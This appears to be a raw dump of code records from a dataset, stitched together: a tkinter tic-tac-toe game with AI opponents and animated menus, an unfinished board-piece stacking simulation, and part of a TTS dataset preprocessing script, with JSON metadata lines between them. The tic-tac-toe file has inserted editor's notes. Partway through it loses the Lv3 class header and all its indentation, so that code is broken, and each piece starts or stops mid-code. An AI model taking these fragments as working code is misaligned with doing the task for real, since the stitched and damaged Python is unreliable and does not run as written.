\n\ndef think2(me, game):\n    if random.randrange(9) < 3:\n        return think3(me, game)\n    else:\n        return think1(me, game)\n\n\ndef think3(me, game, *, noResign=False):\n    (winner, candi) = think_dfs(me, 3 - me, copy.deepcopy(game))\n    if winner == 3 - me and not noResign:\n        return None\n    assert(len(candi) != 0)\n    return random.choice(candi)\n\n\n# }}}\n\n\n# App main {{{\n\nclass TicTacToe(tk.Tk):\n    def __init__(self, *args, **kwargs):\n        tk.Tk.__init__(self, *args, **kwargs)\n\n        self.width = 500\n        self.height = 500\n\n        self.title(\"Tic Tac Toe\")\n        self.geometry(f\"{self.width}x{self.height}\")\n\n        # The main frame\n        container = ttk.Frame(self)\n        container.pack(side=\"top\", fill=\"both\", expand=True)\n\n        # grid_[row/column]configure(index, ...)\n        # lays out the grid with weight-based proportional sizing\n        # https://effbot.org/tkinterbook/grid.htm#Tkinter.Grid.grid_rowconfigure-method\n        container.grid_rowconfigure(0, weight=1)\n        container.grid_columnconfigure(0, weight=1)\n\n        pages = [TitleScene, LevelSelect, Main]  # TODO\n        self.frames = {}\n        for page in pages:\n            page_name = page.__name__\n            frame = page(parent=container, controller=self)\n            self.frames[page_name] = frame\n\n            # center the frame via the grid geometry manager\n            # https://effbot.org/tkinterbook/grid.htm\n            frame.grid(row=0, column=0, sticky=\"nsew\")\n            # specifying \"nsew\" stretches the frame to fill the cell\n\n        self.raise_frame(\"TitleScene\")\n\n    def raise_frame(self, page_name):\n        assert(page_name in self.frames.keys())\n\n        # bring this frame to the top of the stacking order\n        # tkraise : https://kite.com/python/docs/Tkinter.Frame.tkraise\n        frame = self.frames[page_name]\n        frame.refresh()\n        frame.tkraise()\n\n# }}}\n\n\n# Scene abstraction {{{\n\nclass Scene(ttk.Frame):\n    def __init__(self, *args, parent, controller, **kwargs):\n        ttk.Frame.__init__(self, parent, *args, **kwargs)\n        self.parent = parent\n        self.controller = controller\n        self.width = controller.width\n        self.height = controller.height\n\n    def refresh(self):\n        pass\n\n# }}}\n\n\n# Scene: title {{{\n\nclass TitleScene(Scene):\n    def __init__(self, parent, controller):\n        Scene.__init__(self, parent=parent, controller=controller)\n\n        canvas = self.canvas = ttk.Canvas(\n            self,\n            width=500, height=500, bg=\"black\")\n        canvas.pack()\n\n        # https://stackoverflow.com/questions/29401873/tkinter-pil-image-not-displaying-inside-of-a-function\n        # Huge trap: keep the image bound to a variable, or the garbage\n        # collector silently destroys it\n        self.title0_img = ImageTk.PhotoImage(Image.open(\"title1.png\"))\n        canvas.create_image(0, 0, image=self.title0_img, anchor=\"nw\")\n\n        self.left_logo = MiniLogo(canvas, \"left_logo\")\n\n        self.right_logo = MiniLogo(canvas, \"right_logo\")\n\n        self.counter = 0\n        self.after(1000//60, self.update)\n\n        canvas.bind(\"<1>\", lambda ev: controller.raise_frame(\"LevelSelect\"))\n\n    def update(self):\n\n        M = 300\n        self.counter += 1\n        self.counter %= M\n\n        canvas = self.canvas\n        y = self.height - 80 + math.sin(math.pi * 2 * self.counter / M) * 20\n        canvas.delete(\"mes\")\n        canvas.create_text(\n            self.width / 2, y,\n            text=\"touch to start\",\n            fill=\"white\", tags=\"mes\", font=(\"Molot\", 30))\n\n        self.left_logo.pos = (45, y)\n        self.right_logo.pos = (self.width - 45, y)\n\n        self.after(1000//60, self.update)\n\n    def refresh(self):\n        pass\n\n\n# }}}\n\n\n# Small spinning logo {{{\n\nclass MiniLogo:\n    def __init__(self, canvas, tag):\n        self.canvas = canvas\n        self.counter = 0\n        self.tag = tag\n        self.delay = 1000 // 60\n        self.pos = (0, 0)\n        canvas.after(self.delay, self.rotateOuter)\n\n    def my_after(self, M, M2, now, nxt):\n        canvas = self.canvas\n        if self.counter < M:\n            canvas.after(self.delay, now)\n        elif self.counter < M2:\n            canvas.after(self.delay, now)\n        else:\n            self.counter = 0\n            canvas.after(self.delay, nxt)\n
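\n    # Editor's note: each animation phase below draws for M frames, holds the\n    # final pose until M2 (the identical if/elif branches above are deliberate),\n    # then my_after chains to the next phase:\n    # rotateOuter -> shrink -> gather -> rotateInner -> spread -> expand -> ...\n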
\n    # One full turn around the outside\n    def rotateOuter(self):\n        M = 20\n        self.counter += 1\n        canvas = self.canvas\n        tag = self.tag\n        c = min(self.counter / M, 1)\n\n        canvas.delete(tag)\n\n        for i in range(-1, 2):\n            for j in range(-1, 2):\n                my_polygon(\n                    canvas,\n                    (self.pos[0] + i * 12, self.pos[1] + j * 12),\n                    [(-6, -6), (-6, 6), (6, 6), (6, -6)],\n                    rotate=2*math.pi*3/4*c,\n                    fill=\"white\",\n                    width=2,\n                    capstyle=\"projecting\",  # no idea where this is documented any more\n                    tags=tag)\n\n        self.my_after(M, M * 3, self.rotateOuter, self.shrink)\n\n    # Shrink\n    def shrink(self):\n        M = 20\n        self.counter += 1\n        canvas = self.canvas\n        tag = self.tag\n        c = min(self.counter / M, 1)\n\n        canvas.delete(tag)\n\n        for i in range(-1, 2):\n            for j in range(-1, 2):\n                r = 6 * (1 - c * .4)\n                my_polygon(\n                    canvas,\n                    (self.pos[0] + i * 12, self.pos[1] + j * 12),\n                    [(-r, -r), (-r, r), (r, r), (r, -r)],\n                    fill=\"white\",\n                    width=2,\n                    capstyle=\"projecting\",\n                    tags=tag)\n\n        self.my_after(M, M * 3, self.shrink, self.gather)\n\n    # Gather toward the center\n    def gather(self):\n        M = 20\n        self.counter += 1\n        canvas = self.canvas\n        tag = self.tag\n        c = min(self.counter / M, 1)\n\n        canvas.delete(tag)\n\n        for i in range(-1, 2):\n            for j in range(-1, 2):\n                r = 6 * .6\n                my_polygon(\n                    canvas,\n                    (\n                        self.pos[0] + i * 12 * (1 - c),\n                        self.pos[1] + j * 12 * (1 - c)),\n                    [(-r, -r), (-r, r), (r, r), (r, -r)],\n                    fill=\"white\",\n                    width=2,\n                    capstyle=\"projecting\",\n                    tags=tag)\n\n        self.my_after(M, M * 3, self.gather, self.rotateInner)\n\n    # Rotate at the center\n    def rotateInner(self):\n        M = 20\n        self.counter += 1\n        canvas = self.canvas\n        tag = self.tag\n        c = min(self.counter / M, 1)\n\n        canvas.delete(tag)\n\n        r = 6 * .6\n        my_polygon(\n            canvas,\n            self.pos,\n            [(-r, -r), (-r, r), (r, r), (r, -r)],\n            fill=\"white\",\n            rotate=-math.pi*2/4*3*c,\n            width=2,\n            capstyle=\"projecting\",\n            tags=tag)\n\n        self.my_after(M, M * 3, self.rotateInner, self.spread)\n\n    # Spread back out\n    def spread(self):\n        M = 20\n        self.counter += 1\n        canvas = self.canvas\n        tag = self.tag\n        c = min(self.counter / M, 1)\n\n        canvas.delete(tag)\n\n        for i in range(-1, 2):\n            for j in range(-1, 2):\n                r = 6 * .6\n                my_polygon(\n                    canvas,\n                    (self.pos[0] + i * 12 * c, self.pos[1] + j * 12 * c),\n                    [(-r, -r), (-r, r), (r, r), (r, -r)],\n                    fill=\"white\",\n                    width=2,\n                    capstyle=\"projecting\",\n                    tags=tag)\n\n        self.my_after(M, M * 3, self.spread, self.expand)\n\n    # Grow back to full size\n    def expand(self):\n        M = 20\n        self.counter += 1\n        canvas = self.canvas\n        c = min(self.counter / M, 1)\n        tag = self.tag\n\n        canvas.delete(tag)\n\n        for i in range(-1, 2):\n            for j in range(-1, 2):\n                r = 6 * (.4 + c * .6)\n                my_polygon(\n                    canvas,\n                    (self.pos[0] + i * 12, self.pos[1] + j * 12),\n                    [(-r, -r), (-r, r), (r, r), (r, -r)],\n                    fill=\"white\",\n                    width=2,\n                    capstyle=\"projecting\",\n                    tags=tag)\n\n        self.my_after(M, M * 3, self.expand, self.rotateOuter)\n\n# }}}\n\n\n# Scene: level select {{{\n\nclass LevelSelect(Scene):\n    def __init__(self, *args, **kwargs):\n        Scene.__init__(self, *args, **kwargs)\n\n        self.lv1 = LevelSelector(selection, self)\n        self.lv1.place(x=30, y=200)\n        self.lv2 = LevelSelector(selection, self)\n        self.lv2.place(x=260, y=200)\n\n        start_btn = MyButton(\n            self,\n            text=\"start\",\n            width=240, height=60,\n            command=self.start)\n        start_btn.place(x=120, y=420)\n\n        card1 = Player(self, text=\"First\", mark=\"o\", col=first_col)\n        card1.place(x=30, y=100)\n\n        card2 = Player(self, text=\"Second\", mark=\"x\", col=second_col)\n        card2.place(x=260, y=100)\n\n        self.lv1.set(0)\n        self.lv2.set(1)\n\n    def start(self, ev):\n        self.controller.AI1 = self.lv1.getAI()\n        self.controller.AI2 = self.lv2.getAI()\n        self.controller.Card1 = self.lv1.getCard()\n        self.controller.Card2 = self.lv2.getCard()\n\n        self.controller.raise_frame(\"Main\")\n\n    def refresh(self):\n        pass\n\n# }}}\n\n\n# Scene: game {{{\n\nclass Main(Scene):\n    def __init__(self, *args, **kwargs):\n        Scene.__init__(self, *args, **kwargs)\n\n        vs = ttk.Canvas(self, width=200, height=100)\n        vs.create_text(40, 40, text=\"v\", font=(\"Molot\", 23))\n        vs.create_text(60, 50, text=\"s\", font=(\"Molot\", 23))\n        vs.place(x=197, y=10)\n\n        cells = self.cells = [[None for _ in range(3)] for _ in range(3)]\n\n        for i in range(3):\n            for j in range(3):\n                # build a closure so each cell remembers its own (i, j)\n                cell = cells[i][j] = Cell(\n                    self,\n                    width=100, height=100,\n                    command=(lambda i, j: lambda ev: self.clicked(i, j))\n                    (i, j))\n                cell.place(x=90 + 104*i, y=100 + 104*j)\n                cell.setMark(\"o\", first_col)\n\n        self.card = [None, None]\n\n        self.resign_btn = MyButton(\n            self, text=\"resign\",\n            width=140, height=60,\n            command=self.resign)\n        self.help_btn = MyButton(\n            self, text=\"help\",\n            width=140, height=60,\n            command=self.help)\n        self.quit_btn = MyButton(\n            self, text=\"quit\",\n            width=140, height=60,\n            command=self.quit)\n\n        self.message = None\n
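\n    # Editor's note: the (lambda i, j: lambda ev: ...)(i, j) pattern in\n    # __init__ above freezes each cell's indices; a bare\n    # lambda ev: self.clicked(i, j) would late-bind i and j to their final\n    # loop values.\n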
\n    def human_interface(self, show):\n        if show:\n            self.resign_btn.place(x=10, y=420)\n            self.help_btn.place(x=170, y=420)\n            self.quit_btn.place(x=330, y=420)\n        else:\n            self.resign_btn.place_forget()\n            self.help_btn.place_forget()\n            self.quit_btn.place_forget()\n\n    def over(self):\n        self.message = ttk.Canvas(self, width=300, height=100)\n        self.message.place(x=20, y=410)\n        self.gameover = True\n        self.refrectGame()\n        self.human_interface(False)\n        self.quit_btn.place(x=330, y=420)\n\n    def draw(self):\n        self.over()\n        self.message.create_text(140, 40, text=\"draw\", font=(\"Molot\", 30))\n\n    def resigned(self):\n        self.over()\n        writePlayer(self.message, self.turn, 60, 25, small=True)\n        self.message.create_text(190, 25, text=\"resigned.\", font=(\"Molot\", 18))\n        writePlayer(self.message, 1 - self.turn, 130, 60)\n        self.message.create_text(260, 60, text=\"win\", font=(\"Molot\", 25))\n\n    def playerWin(self):\n        self.over()\n        writePlayer(self.message, self.turn, 70, 40)\n        self.message.create_text(200, 40, text=\"win\", font=(\"Molot\", 25))\n\n    def refresh(self):\n        self.game = Game()\n\n        self.AI = [self.controller.AI1, self.controller.AI2]\n\n        for c in self.card:\n            if c:\n                c.place_forget()\n\n        if self.message:\n            self.message.place_forget()\n\n        Card1 = self.controller.Card1\n        Card2 = self.controller.Card2\n\n        self.card = [Card1(self), Card2(self)]\n\n        self.card[0].place(x=20, y=10)\n        self.card[1].place(x=270, y=25)\n\n        self.is_human = False\n        self.gameover = False\n        self.turn = 0\n        self.turnSetup()\n\n    def refrectGame(self):\n        for i in range(3):\n            for j in range(3):\n                w = self.game.get(i, j)\n                self.cells[i][j].disabled = not self.is_human or self.gameover\n                if w == 0:\n                    self.cells[i][j].setMark(\n                        \"o\" if self.turn == 0 else \"x\",\n                        first_col_light if self.turn == 0\n                        else second_col_light)\n                    self.cells[i][j].setDetermined(False)\n                elif w == 1:\n                    self.cells[i][j].setMark(\"o\", first_col)\n                    self.cells[i][j].setDetermined(True)\n                elif w == 2:\n                    self.cells[i][j].setMark(\"x\", second_col)\n                    self.cells[i][j].setDetermined(True)\n\n    def turnSetup(self):\n        self.is_human = self.AI[self.turn].name == \"human\"\n        self.opps = 1 - self.turn\n\n        self.refrectGame()\n\n        self.card[self.turn].setActive(True)\n        self.card[self.opps].setActive(False)\n\n        self.human_interface(self.is_human)\n\n        if not self.is_human:\n            self.after(C_DELAY, self.AI_choose)\n\n    def AI_choose(self):\n        sel = self.AI[self.turn].think(self.turn + 1, self.game)\n        if sel is None:\n            self.resigned()\n            return\n        self.game.set(sel[0], sel[1], self.turn + 1)\n        self.next()\n\n    def clicked(self, i, j):\n        if self.game.get(i, j) != 0:\n            return\n        if not self.is_human or self.gameover:\n            return\n        self.game.set(i, j, self.turn + 1)\n        self.next()\n\n    def resign(self, ev):\n        if not self.is_human or self.gameover:\n            return\n        self.resigned()\n\n    def help(self, ev):\n        if not self.is_human or self.gameover:\n            return\n        # the player number is turn + 1 (1 or 2), matching AI_choose above\n        sel = think3(self.turn + 1, self.game, noResign=True)\n        self.game.set(sel[0], sel[1], self.turn + 1)\n        self.next()\n\n    def quit(self, ev):\n        if not self.is_human and not self.gameover:\n            return\n        self.controller.raise_frame(\"TitleScene\")\n\n    def next(self):\n        ch = self.game.check()\n        if ch == 0:\n            self.turn = 1 - self.turn\n            self.turnSetup()\n        elif ch == -1:\n            self.draw()\n        elif ch == 1 or ch == 2:\n            self.playerWin()\n\n# }}}\n\n\n# Buttons {{{\n\nclass MyButton(ttk.Canvas):\n    def __init__(\n            self, *args, width, height,\n            command=None, text=\"\",\n            col1=from_rgb((240, 200, 200)),\n            col2=from_rgb((240, 160, 160)),\n            col3=from_rgb((240, 60, 60)),\n            after_moved=None,\n            after_leaved=None,\n            fontsize=18, **kwargs):\n        ttk.Canvas.__init__(self, *args, width=width, height=height, **kwargs)\n\n        self.disabled = False\n\n        self.width = width\n        self.height = height\n\n        self.col1 = col1\n        self.col2 = col2\n        self.col3 = col3\n\n        self.after_moved = after_moved\n        self.after_leaved = after_leaved\n\n        if command:\n            self.bind(\"<1>\", command)\n\n        # editor's guess: the original event names were missing here;\n        # <Enter>/<Motion>/<ButtonRelease-1> and <Leave> are plausible\n        # reconstructions that match the moved()/leaved() handlers below\n        self.bind(\"<1>\", self.pressing, add=\"+\")\n        self.bind(\"<Enter>\", self.moved)\n        self.bind(\"<Motion>\", self.moved)\n        self.bind(\"<ButtonRelease-1>\", self.moved)\n        self.bind(\"<Leave>\", self.leaved)\n\n        self.leaved(None)\n\n        self.text = self.create_text(\n            width/2, height/2,\n            text=text, font=(\"Molot\", fontsize))\n\n    def pressing(self, ev, force=False):\n        if self.disabled and not force:\n            return\n        width, height = self.width, self.height\n        self.delete(\"face\")\n        self.create_rectangle(\n            4, 4, width, height,\n            fill=self.col3,\n            outline=from_rgb((120, 120, 120)), width=4, tags=\"face\"\n        )\n        self.lower(\"face\")\n
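\n    # Editor's note: pressing/moved/leaved repaint the \"face\" rectangle in\n    # col3/col2/col1 respectively and push it beneath the label via\n    # self.lower(\"face\").\n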
\n    def moved(self, ev, force=False):\n        if self.disabled and not force:\n            return\n        width, height = self.width, self.height\n        self.delete(\"face\")\n        self.create_rectangle(\n            4, 4, width, height,\n            fill=self.col2,\n            outline=from_rgb((120, 120, 120)), width=4, tags=\"face\"\n        )\n        self.lower(\"face\")\n        if self.after_moved:\n            self.after_moved()\n\n    def leaved(self, ev, force=False):\n        if self.disabled and not force:\n            return\n        width, height = self.width, self.height\n        self.delete(\"face\")\n        self.create_rectangle(\n            4, 4, width, height,\n            fill=self.col1,\n            outline=from_rgb((120, 120, 120)), width=4, tags=\"face\"\n        )\n        self.lower(\"face\")\n        if self.after_leaved:\n            self.after_leaved()\n\n# }}}\n\n\n# Cell {{{\n\nclass Cell(MyButton):\n    def __init__(self, *args, **kwargs):\n        self.determined = False\n        self.mark = \"\"\n        self.col = \"black\"\n\n        MyButton.__init__(\n            self, *args,\n            col1=\"#EEEEEE\",\n            col2=\"#DDDDDD\",\n            col3=\"#888888\",\n            after_moved=self.after_moved,\n            after_leaved=self.after_leaved,\n            **kwargs)\n\n        self.setDetermined(False)\n\n    def setDetermined(self, determined):\n        self.determined = determined\n\n        if determined:\n            self.delete(\"mark\")\n            self.create_text(\n                50, 50,\n                text=self.mark, font=(\"Molot\", 50),\n                tags=\"mark\",\n                fill=self.col)\n\n            self.col1 = \"#EEEEEE\"\n            self.col2 = \"#EEEEEE\"\n            self.col3 = \"#EEEEEE\"\n            self.leaved(None, force=True)\n        else:\n            self.col1 = \"#EEEEEE\"\n            self.col2 = \"#DDDDDD\"\n            self.col3 = \"#888888\"\n            self.leaved(None, force=True)\n\n    def setMark(self, mark, col):\n        self.mark = mark\n        self.col = col\n\n    def after_moved(self):\n        if self.determined:\n            return\n        self.delete(\"mark\")\n        self.create_text(\n            50, 50,\n            text=self.mark, font=(\"Molot\", 50),\n            tags=\"mark\",\n            fill=self.col)\n\n    def after_leaved(self):\n        if self.determined:\n            return\n        self.delete(\"mark\")\n\n# }}}\n\n\n# Level cards {{{\n\nclass Lv1(ttk.Canvas):\n    def __init__(\n            self, *args, **kwargs):\n        self.width = width = 200\n        self.height = height = 60\n        ttk.Canvas.__init__(self, *args, width=width, height=height, **kwargs)\n\n        self.setActive(True)\n\n    def setActive(self, active):\n        width = self.width\n        height = self.height\n\n        self.delete(\"all\")\n\n        self.create_rectangle(\n            4, 4, width, height,\n            fill=from_rgb((240, 240, 200)) if active\n            else \"#AAAAAA\",\n            outline=\"black\",\n            width=4 if active else 1,\n            tags=\"face\"\n        )\n        self.text = self.create_text(\n            20 + width/2, height/2,\n            text=\"Lv.1\", font=(\"Molot\", 22))\n        r = 4\n        square = [(-r, -r), (-r, r), (r, r), (r, -r)]\n\n        my_polygon(self, (width/2 - 40, height/2), square)\n\n\nclass Lv2(ttk.Canvas):\n    def __init__(\n            self, *args, **kwargs):\n        self.width = width = 200\n        self.height = height = 60\n        ttk.Canvas.__init__(self, *args, width=width, height=height, **kwargs)\n\n        self.setActive(True)\n\n    def setActive(self, active):\n        width = self.width\n        height = self.height\n\n        self.delete(\"all\")\n\n        self.create_rectangle(\n            4, 4, width, height,\n            fill=from_rgb((240, 200, 160)) if active\n            else \"#AAAAAA\",\n            outline=\"black\",\n            width=4 if active else 1,\n            tags=\"face\"\n        )\n        self.text = self.create_text(\n            20 + width/2, height/2,\n            text=\"Lv.2\", font=(\"Molot\", 22))\n        r = 4\n        square = [(-r, -r), (-r, r), (r, r), (r, -r)]\n\n        my_polygon(self, (width/2 - 40, height/2-6), square)\n        my_polygon(self, (width/2 - 40 - 8, height/2+8), square)\n        my_polygon(self, (width/2 - 40 + 8, height/2+8), square)\n
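\n\n# Editor's note (refactor sketch, not applied): the Lv1/Lv2/Lv3/HumanLavel\n# cards differ only in fill colour, label text and glyph; a single\n# parameterized LevelCard(colour, label, draw_glyph) class could express the\n# same UI.\n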
self.setActive(True)\n\n def setActive(self, active):\n width = self.width\n height = self.height\n\n self.delete(\"all\")\n\n self.create_rectangle(\n 4, 4, width, height,\n fill=from_rgb((240, 160, 150)) if active\n else \"#AAAAAA\",\n outline=\"black\",\n width=4 if active else 1,\n tags=\"face\"\n )\n self.text = self.create_text(\n 20 + width/2, height/2,\n text=\"Lv.3\", font=(\"Molot\", 22))\n\n r = 2\n square = [(-r, -r), (-r, r), (r, r), (r, -r)]\n my_polygon(self, (width/2 - 40, height/2+2), square)\n\n r = 4\n square = [(-r, -r), (-r, r), (r, r), (r, -r)]\n my_polygon(self, (width/2 - 40, height/2-6), square)\n my_polygon(self, (width/2 - 40 - 8, height/2+8), square)\n my_polygon(self, (width/2 - 40 + 8, height/2+8), square)\n self.create_arc(\n width/2 - 45, height/2 - 3,\n width/2 - 35, height/2 + 7,\n extent=359, style=\"chord\")\n\n\nclass HumanLabel(ttk.Canvas):\n def __init__(\n self, *args, **kwargs):\n self.width = width = 200\n self.height = height = 60\n ttk.Canvas.__init__(self, *args, width=width, height=height, **kwargs)\n\n self.setActive(True)\n\n def setActive(self, active):\n width = self.width\n height = self.height\n\n self.delete(\"all\")\n\n self.create_rectangle(\n 4, 4, width, height,\n fill=from_rgb((200, 240, 240)) if active\n else \"#AAAAAA\",\n outline=\"black\",\n width=4 if active else 1,\n tags=\"face\"\n )\n self.text = self.create_text(\n 20 + width/2, height/2,\n text=\"human\", font=(\"Molot\", 22))\n r = 4\n square = [(-r, -r), (-r, r), (r, r), (r, -r)]\n\n my_polygon(self, (width/2 - 60, height/2 - 10), square)\n self.create_line(\n (width/2 - 60 - 8, height/2 + 8),\n (width/2 - 60, height/2 - 6))\n self.create_line(\n (width/2 - 60 + 8, height/2 + 8),\n (width/2 - 60, height/2 - 6))\n self.create_line(\n (width/2 - 60, height/2 - 6),\n (width/2 - 60, height/2 + 16))\n self.create_line(\n (width/2 - 60, height/2 + 16),\n (width/2 - 60 - 8, height/2 + 16 + 8))\n self.create_line(\n (width/2 - 60, height/2 + 16),\n (width/2 - 60 + 8, height/2 + 16 + 8))\n\n# }}}\n\n\n# Level selector {{{\n\nclass LevelSelector(ttk.Frame):\n def __init__(self, selection, *args, **kwargs):\n ttk.Frame.__init__(self, *args, **kwargs)\n self.selection = selection\n self.n = len(selection)\n\n # prev button\n prev_btn = self.btn = MyButton(\n self, width=100, height=60,\n text=\"prev\", command=lambda ev: self.prev())\n prev_btn.grid(row=0, column=0)\n\n # next button\n next_btn = self.btn = MyButton(\n self,\n width=100, height=60,\n text=\"next\", command=lambda ev: self.next())\n next_btn.grid(row=2, column=0)\n\n self.cards = []\n for (AI, Card) in selection:\n frame = ttk.Frame(self)\n frame.grid(row=1, column=0, sticky=\"nsew\")\n card = Card(frame)\n card.grid(row=1, column=0, sticky=\"nsew\")\n self.cards.append(frame)\n\n self.index = 0\n self.raiseCard(0)\n\n def raiseCard(self, num):\n assert(0 <= num < self.n)\n self.cards[num].tkraise()\n\n def next(self):\n self.index += 1\n self.index %= self.n\n self.raiseCard(self.index)\n\n def prev(self):\n self.index -= 1\n self.index %= self.n\n self.raiseCard(self.index)\n\n def getAI(self):\n return self.selection[self.index][0]\n\n def getCard(self):\n return self.selection[self.index][1]\n\n def set(self, index):\n self.index = index\n self.raiseCard(self.index)\n\n# }}}\n\n\n# AI setup {{{\n\nhuman = (GameAI(None, \"human\"), HumanLabel)\nAI1 = (GameAI(think1, \"computer (level1)\"), Lv1)\nAI2 = (GameAI(think2, \"computer (level2)\"), Lv2)\nAI3 = (GameAI(think3, \"computer (level3)\"), Lv3) # TODO\n\nselection = [human, 
AI1, AI2, AI3]\n\n# }}}\n\n\n# Player cards {{{\n\n# reused for both the first and second player\nclass Player(ttk.Frame):\n def __init__(self, *args, text, mark, col, **kwargs):\n ttk.Frame.__init__(self, *args, **kwargs)\n self.width = width = 200\n self.height = height = 80\n\n canvas = ttk.Canvas(self, width=width, height=height)\n canvas.grid()\n\n canvas.create_rectangle(\n 4, 4, width, height,\n fill=from_rgb((240, 240, 240)),\n outline=\"black\", width=4, tags=\"face\"\n )\n canvas.create_text(\n width/2 - 20, height/2,\n text=text, font=(\"Molot\", 22))\n canvas.create_text(\n width/2 + 50, height/2,\n text=mark, font=(\"Molot\", 40),\n fill=col)\n\n# }}}\n\n\n# main loop\nif __name__ == \"__main__\":\n app = TicTacToe()\n app.mainloop()\n","repo_name":"LumaKernel/python-ttt","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":32310,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"36029416838","text":"# I,,, just,,, can't do this one,,,\n\nn,k=map(int,input().split())\nboard=[]\nunit=[]\ntmp_board,tmp_order=[],[]\nd=[(),(0,1),(0,-1),(-1,0),(1,0)]\nfor _ in range(n):\n board.append(list(map(int,input().split())))\nfor _ in range(k):\n unit.append(list(map(int,input().split())))\n\ntmp_board = [[[] for _ in range(n)] for _ in range(n)]\n\nfor i in range(k): # initial placement\n x, y, directions = unit[i]\n tmp_board[x][y].append((i, directions))\n\nwhile True:\n\n for i in range(k): # move each piece\n x, y, directions = unit[i]\n X=x+d[directions][0]\n Y=y+d[directions][1]\n if 0<=X<n and 0<=Y<n and len(tmp_board[x][y])>=2: # if two or more pieces are stacked\n for ii in range(len(tmp_board[x][y])):\n if tmp_board[x][y][ii][0]==i: # move this piece and the ones above it\n info=tmp_board[x][y][ii:]\n tmp_board[x][y]=tmp_board[x][y][:ii]\n break\n if board[X][Y]!=2:\n tmp_board[X][Y].extend(info)\n unit[i] = (X, Y, directions) # where the piece now sits\n if board[X][Y]==1:\n tmp_board[X][Y].reverse()\n print(X,Y,'found a 1 at this position, reversing that stack')\n print(tmp_board[X][Y])\n\n else:\n if directions == 1: new_dir = 2 # flip the direction (could not express it as a formula, so wrote out each case)\n elif directions == 2: new_dir = 1\n elif directions == 3: new_dir = 4\n else: new_dir = 3\n XX,YY=x+d[new_dir][0],y+d[new_dir][1]\n info[0]=(i,new_dir)\n if board[XX][YY]==2: # if the bounce-back side is blue as well\n tmp_board[x][y].extend(info)\n unit[i] = (x, y, new_dir)\n elif 0<=XX None:\r\n parser = argparse.ArgumentParser()\r\n parser.add_argument(\r\n \"--input-dir\", required=True, help=\"Directory with audio dataset\"\r\n )\r\n parser.add_argument(\r\n \"--output-dir\",\r\n required=True,\r\n help=\"Directory to write output files for training\",\r\n )\r\n parser.add_argument(\"--language\", required=True, help=\"eSpeak-ng voice\")\r\n parser.add_argument(\r\n \"--sample-rate\",\r\n type=int,\r\n required=True,\r\n help=\"Target sample rate for voice (hertz)\",\r\n )\r\n parser.add_argument(\r\n \"--dataset-format\", choices=(\"ljspeech\", \"mycroft\"), required=True\r\n )\r\n parser.add_argument(\"--cache-dir\", help=\"Directory to cache processed audio files\")\r\n parser.add_argument(\"--max-workers\", type=int)\r\n parser.add_argument(\r\n \"--single-speaker\", action=\"store_true\", help=\"Force single speaker dataset\"\r\n )\r\n parser.add_argument(\r\n \"--speaker-id\", type=int, help=\"Add speaker id to single speaker dataset\"\r\n )\r\n parser.add_argument(\r\n \"--debug\", action=\"store_true\", help=\"Print DEBUG messages to the console\"\r\n )\r\n args = parser.parse_args()\r\n\r\n if args.single_speaker and (args.speaker_id is not None):\r\n _LOGGER.fatal(\"--single-speaker and --speaker-id cannot both be provided\")\r\n return\r\n\r\n level = 
logging.DEBUG if args.debug else logging.INFO\r\n logging.basicConfig(level=level)\r\n logging.getLogger().setLevel(level)\r\n\r\n # Prevent log spam\r\n logging.getLogger(\"numba\").setLevel(logging.WARNING)\r\n\r\n # Convert to paths and create output directories\r\n args.input_dir = Path(args.input_dir)\r\n args.output_dir = Path(args.output_dir)\r\n args.output_dir.mkdir(parents=True, exist_ok=True)\r\n\r\n args.cache_dir = (\r\n Path(args.cache_dir)\r\n if args.cache_dir\r\n else args.output_dir / \"cache\" / str(args.sample_rate)\r\n )\r\n args.cache_dir.mkdir(parents=True, exist_ok=True)\r\n\r\n if args.dataset_format == \"mycroft\":\r\n make_dataset = mycroft_dataset\r\n else:\r\n make_dataset = ljspeech_dataset\r\n\r\n # Count speakers\r\n _LOGGER.debug(\"Counting number of speakers/utterances in the dataset\")\r\n speaker_counts: Counter[str] = Counter()\r\n num_utterances = 0\r\n for utt in make_dataset(args.input_dir, args.single_speaker, args.speaker_id):\r\n speaker = utt.speaker or \"\"\r\n speaker_counts[speaker] += 1\r\n num_utterances += 1\r\n\r\n assert num_utterances > 0, \"No utterances found\"\r\n\r\n is_multispeaker = len(speaker_counts) > 1\r\n speaker_ids: Dict[str, int] = {}\r\n\r\n if is_multispeaker:\r\n _LOGGER.info(\"%s speakers detected\", len(speaker_counts))\r\n\r\n # Assign speaker ids by most number of utterances first\r\n for speaker_id, (speaker, _speaker_count) in enumerate(\r\n speaker_counts.most_common()\r\n ):\r\n speaker_ids[speaker] = speaker_id\r\n else:\r\n _LOGGER.info(\"Single speaker dataset\")\r\n\r\n # Write config\r\n with open(args.output_dir / \"config.json\", \"w\", encoding=\"utf-8\") as config_file:\r\n json.dump(\r\n {\r\n \"audio\": {\r\n \"sample_rate\": args.sample_rate,\r\n },\r\n \"espeak\": {\r\n \"voice\": args.language,\r\n },\r\n \"inference\": {\"noise_scale\": 0.667, \"length_scale\": 1, \"noise_w\": 0.8},\r\n \"phoneme_map\": {},\r\n \"phoneme_id_map\": DEFAULT_PHONEME_ID_MAP,\r\n \"num_symbols\": len(\r\n set(itertools.chain.from_iterable(DEFAULT_PHONEME_ID_MAP.values()))\r\n ),\r\n \"num_speakers\": len(speaker_counts),\r\n \"speaker_id_map\": speaker_ids,\r\n },\r\n config_file,\r\n ensure_ascii=False,\r\n indent=4,\r\n )\r\n _LOGGER.info(\"Wrote dataset config\")\r\n\r\n if (args.max_workers is None) or (args.max_workers < 1):\r\n args.max_workers = os.cpu_count()\r\n\r\n assert args.max_workers is not None\r\n\r\n batch_size = int(num_utterances / (args.max_workers * 2))\r\n queue_in: \"Queue[Iterable[Utterance]]\" = JoinableQueue()\r\n queue_out: \"Queue[Optional[Utterance]]\" = Queue()\r\n\r\n # Start workers\r\n processes = [\r\n Process(target=process_batch, args=(args, queue_in, queue_out))\r\n for _ in range(args.max_workers)\r\n ]\r\n for proc in processes:\r\n proc.start()\r\n\r\n _LOGGER.info(\r\n \"Processing %s utterance(s) with %s worker(s)\", num_utterances, args.max_workers\r\n )\r\n with open(args.output_dir / \"dataset.jsonl\", \"w\", encoding=\"utf-8\") as dataset_file:\r\n for utt_batch in batched(\r\n make_dataset(args.input_dir, args.single_speaker, args.speaker_id),\r\n batch_size,\r\n ):\r\n queue_in.put(utt_batch)\r\n\r\n _LOGGER.debug(\"Waiting for jobs to finish\")\r\n for _ in range(num_utterances):\r\n utt = 